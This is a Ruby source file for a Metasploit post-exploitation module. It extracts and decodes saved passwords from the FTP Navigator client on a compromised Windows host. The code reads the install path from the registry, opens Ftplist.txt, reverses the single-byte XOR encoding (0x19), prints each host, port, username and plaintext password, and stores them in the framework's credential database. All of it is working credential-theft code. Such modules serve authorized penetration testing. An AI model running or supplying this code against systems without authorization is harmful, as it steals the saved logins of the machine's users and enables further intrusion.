1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Windows::Registry
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',
15
        'Description' => %q{
16
          This module extracts saved passwords from the FTP Navigator FTP client.
17
          It will decode the saved passwords and store them in the database.
18
        },
19
        'License' => MSF_LICENSE,
20
        'Author' => ['theLightCosine'],
21
        'Platform' => [ 'win' ],
22
        'SessionTypes' => [ 'meterpreter' ],
23
        'Notes' => {
24
          'Stability' => [CRASH_SAFE],
25
          'SideEffects' => [],
26
          'Reliability' => []
27
        },
28
        'Compat' => {
29
          'Meterpreter' => {
30
            'Commands' => %w[
31
              core_channel_eof
32
              core_channel_open
33
              core_channel_read
34
              core_channel_write
35
            ]
36
          }
37
        }
38
      )
39
    )
40
  end
41

42
  def run
43
    key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Navigator_is1\\'
44
    val_name = 'InstallLocation'
45
    installdir = registry_getvaldata(key, val_name) || 'c:\\FTP Navigator\\'
46

47
    path = "#{installdir}Ftplist.txt"
48

49
    begin
50
      ftplist = client.fs.file.new(path, 'r')
51
    rescue Rex::Post::Meterpreter::RequestError => e
52
      print_error("Unable to open Ftplist.txt: #{e}")
53
      print_error('FTP Navigator May not Ne Installed')
54
      return
55
    end
56

57
    lines = ftplist.read.split("\n")
58
    lines.each do |line|
59
      next if line.include? 'Anonymous=1'
60
      next unless line.include? ';Password='
61

62
      dpass = ''
63
      username = ''
64
      server = ''
65
      port = ''
66

67
      line.split(';').each do |field|
68
        next if field.include? 'SavePassword'
69

70
        if field.include? 'Password='
71
          epass = split_values(field)
72
          dpass = decode_pass(epass)
73
        elsif field.include? 'User='
74
          username = split_values(field)
75
        elsif field.include? 'Server='
76
          server = split_values(field)
77
        elsif field.include? 'Port='
78
          port = split_values(field)
79
        end
80
      end
81

82
      print_good("Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}")
83
      service_data = {
84
        address: Rex::Socket.getaddress(server),
85
        port: port,
86
        protocol: 'tcp',
87
        service_name: 'ftp',
88
        workspace_id: myworkspace_id
89
      }
90

91
      credential_data = {
92
        origin_type: :session,
93
        session_id: session_db_id,
94
        post_reference_name: refname,
95
        username: username,
96
        private_data: dpass,
97
        private_type: :password
98
      }
99

100
      credential_core = create_credential(credential_data.merge(service_data))
101

102
      login_data = {
103
        core: credential_core,
104
        access_level: 'User',
105
        status: Metasploit::Model::Login::Status::UNTRIED
106
      }
107

108
      create_credential_login(login_data.merge(service_data))
109
    end
110
  end
111

112
  def split_values(field)
113
    values = field.split('=', 2)
114
    return values[1]
115
  end
116

117
  def decode_pass(encoded)
118
    decoded = ''
119
    encoded.unpack('C*').each do |achar|
120
      decoded << (achar ^ 0x19)
121
    end
122
    return decoded
123
  end
124
end
125

126